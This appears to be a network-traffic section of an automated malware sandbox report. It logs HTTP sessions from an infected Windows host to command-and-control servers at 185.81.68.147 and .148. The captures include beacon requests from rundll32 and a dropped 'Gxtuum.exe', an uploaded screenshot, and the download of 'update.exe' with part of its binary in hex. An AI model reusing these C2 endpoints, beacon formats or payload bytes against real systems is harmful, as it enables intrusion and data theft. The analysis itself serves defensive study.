35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49787	185.81.68.147	80	1248	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:38.144619942 CET	156	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 01:37:39.459280014 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:38 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49790	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:38.886986971 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:39.006882906 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:40.328447104 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49791	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:39.013227940 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:37:40.305244923 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49792	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:39.269634962 CET	173	OUT	POST /8Fvu5jh4DbS/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODU4NzA= Host: 185.81.68.148 Content-Length: 86022 Cache-Control: no-cache
Dec 13, 2024 01:37:39.269685030 CET	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 55 34 4e 7a 41 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODU4NzA=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Dec 13, 2024 01:37:39.269910097 CET	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Dec 13, 2024 01:37:39.269937992 CET	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Dec 13, 2024 01:37:39.269967079 CET	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Dec 13, 2024 01:37:39.270059109 CET	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Dec 13, 2024 01:37:39.270087957 CET	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Dec 13, 2024 01:37:39.270102978 CET	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Dec 13, 2024 01:37:39.270128965 CET	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Dec 13, 2024 01:37:39.270229101 CET	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Dec 13, 2024 01:37:39.270229101 CET	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Dec 13, 2024 01:37:41.169337988 CET	198	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 20 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49793	185.81.68.148	80	3876	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:39.311080933 CET	159	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 01:37:40.683676958 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49794	185.81.68.148	80	1248	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:39.641201019 CET	159	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 01:37:41.037235975 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49800	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:40.563757896 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:40.684298038 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:42.168209076 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:41 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49801	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:42.125724077 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 01:37:43.458689928 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49802	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:42.391860962 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:42.511702061 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:44.065830946 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49808	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:42.834415913 CET	184	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 32 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 38 31 30 32 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10000810201&unit=246122658369
Dec 13, 2024 01:37:44.163871050 CET	201	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e Data Ascii: <c>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49809	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:44.307064056 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:44.426772118 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:44.876769066 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:45.317236900 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:45.903904915 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49813	185.81.68.148	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:45.445676088 CET	312	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
Dec 13, 2024 01:37:46.805918932 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49816	185.81.68.147	80	3408	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:45.878642082 CET	49	OUT	GET /update.exe HTTP/1.1 Host: 185.81.68.147
Dec 13, 2024 01:37:47.205100060 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 05:53:20 GMT ETag: "4b400-6290c54e671ba" Accept-Ranges: bytes Content-Length: 308224 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 7a 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$a\i%=:%=:%=:,EJ:&=:%=:&=:JKr:-=:JKC:$=:JKD:$=:Rich%=:PEd<zZg":*\4@@@h((@P .text9: `.rdataP>@@.datap@.pdata@X@@.rsrc(\@@.x64`T`
Dec 13, 2024 01:37:47.205118895 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 ff 15 Data Ascii: HT$HL$H8HL$@?HD$(HT$HHL$(?HD$ HD$ H8HT$HL$H8HL$@7`HD$(HT$HHL$(*`HD$ HD$ H8H
Dec 13, 2024 01:37:47.205136061 CET	1236	IN	Data Raw: 48 48 8d 05 75 3f 00 00 48 89 44 24 30 48 8d 05 71 3f 00 00 48 89 44 24 20 48 8d 05 79 3f 00 00 48 89 05 b6 5f 00 00 48 8d 05 6f 3f 00 00 48 89 05 50 5f 00 00 48 8d 05 79 3f 00 00 48 89 05 a2 5f 00 00 48 8d 05 a3 3f 00 00 48 89 05 5c 5f 00 00 48 Data Ascii: HHu?HD$0Hq?HD$ Hy?H_Ho?HP_Hy?H_H?H\_H%@H>_H?H(_H@HB_HD$(H@H@H__H@H@HM_H@H@H;_H@H@H)_H@
Dec 13, 2024 01:37:47.205184937 CET	1236	IN	Data Raw: 00 00 e8 d2 fa ff ff 48 89 05 f3 5d 00 00 48 8d 15 f4 41 00 00 48 8d 0d 05 42 00 00 e8 b8 fa ff ff 48 89 05 e1 5d 00 00 48 8d 15 02 42 00 00 48 8d 0d 0b 42 00 00 e8 9e fa ff ff 48 89 05 cf 5d 00 00 48 8d 15 08 42 00 00 48 8d 0d 11 42 00 00 e8 84 Data Ascii: H]HAHBH]HBHBH]HBHBH]HBHBjH]HBH%BPH]H"BH+B6H]H(BH1BHu]H.BHGBHc]HDBHMBH
Dec 13, 2024 01:37:47.205209017 CET	1236	IN	Data Raw: 48 8d 15 a6 43 00 00 48 8d 0d b7 43 00 00 e8 f2 f5 ff ff 48 89 05 db 57 00 00 48 8d 15 b4 43 00 00 48 8d 0d bd 43 00 00 e8 d8 f5 ff ff 48 89 05 c9 57 00 00 48 8d 15 ba 43 00 00 48 8d 0d c3 43 00 00 e8 be f5 ff ff 48 89 05 2f 57 00 00 48 8d 15 c0 Data Ascii: HCHCHWHCHCHWHCHCH/WHCHCHWHCHCHWHCHCpHVHCHCVHVHCHD<HVHCHD"HVHDH
Dec 13, 2024 01:37:47.205224991 CET	1236	IN	Data Raw: 24 58 48 03 d1 48 8b ca 4c 8d 4c 24 60 44 8b c0 48 8b d1 48 8b 4c 24 38 ff 15 03 53 00 00 85 c0 74 19 83 7c 24 60 00 76 12 8b 44 24 60 8b 4c 24 48 03 c8 8b c1 89 44 24 48 eb b2 48 8b 84 24 90 00 00 00 8b 4c 24 48 89 08 48 8b 4c 24 38 ff 15 75 52 Data Ascii: $XHHLL$`DHHL$8St\|$`vD$`L$HD$HH$L$HHL$8uRHL$PjRHD$XHxDD$T$HL$H(DD$8HT$0HBOSH(DD$T$HL$H(DD$8HT$0HBSH(DD$T$H
Dec 13, 2024 01:37:47.205240965 CET	1236	IN	Data Raw: e9 75 05 00 00 48 8b 44 24 60 48 89 44 24 70 48 8b 44 24 70 48 63 40 3c 48 8b 4c 24 60 48 03 c8 48 8b c1 48 89 84 24 f0 00 00 00 48 8b 84 24 f0 00 00 00 8b 40 50 c7 44 24 20 40 00 00 00 41 b9 00 30 00 00 44 8b c0 48 8b 94 24 10 01 00 00 48 8b 8c Data Ascii: uHD$`HD$pHD$pHc@<HL$`HHH$H$@PD$ @A0DH$H$ NH$`H$`uA3HL$`MH$@THD$ DLD$`H$H$ 3NuA3HL$`L$P$P$P
Dec 13, 2024 01:37:47.205256939 CET	1236	IN	Data Raw: 8c 24 20 01 00 00 ff 15 0d 4a 00 00 48 8b 84 24 f0 00 00 00 8b 40 28 48 8b 8c 24 60 03 00 00 48 03 c8 48 8b c1 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 48 89 84 24 f0 03 00 00 48 8d 94 24 70 03 00 00 48 8b 8c 24 28 01 00 00 ff 15 f6 49 00 Data Ascii: $ JH$@(H$`HHH$PH$PH$H$pH$(IuA3HL$`GH:H$(IuA3HL$` HA3HL$`HH_HT$L$H(3fD$H$HD$HD$8Hc@<HL$8HHHD$HD$
Dec 13, 2024 01:37:47.205465078 CET	776	IN	Data Raw: 24 90 00 00 00 48 c7 44 24 20 00 00 00 00 44 8b c8 4c 8b 84 24 88 00 00 00 48 8b 54 24 48 48 8b 8c 24 80 00 00 00 ff 15 19 45 00 00 85 c0 75 05 e9 90 00 00 00 8b 84 24 90 00 00 00 48 8d 4c 24 40 48 89 4c 24 20 41 b9 20 00 00 00 44 8b c0 48 8b 54 Data Ascii: $HD$ DL$HT$HH$Eu$HL$@HL$ A DHT$HH$;Eu]D$DHL$HHHHD$XHD$hHD$0D$(H$HD$ LL$XA3H$CHD$`3HD$`HxH8H4HD$ LD$ 33DHD
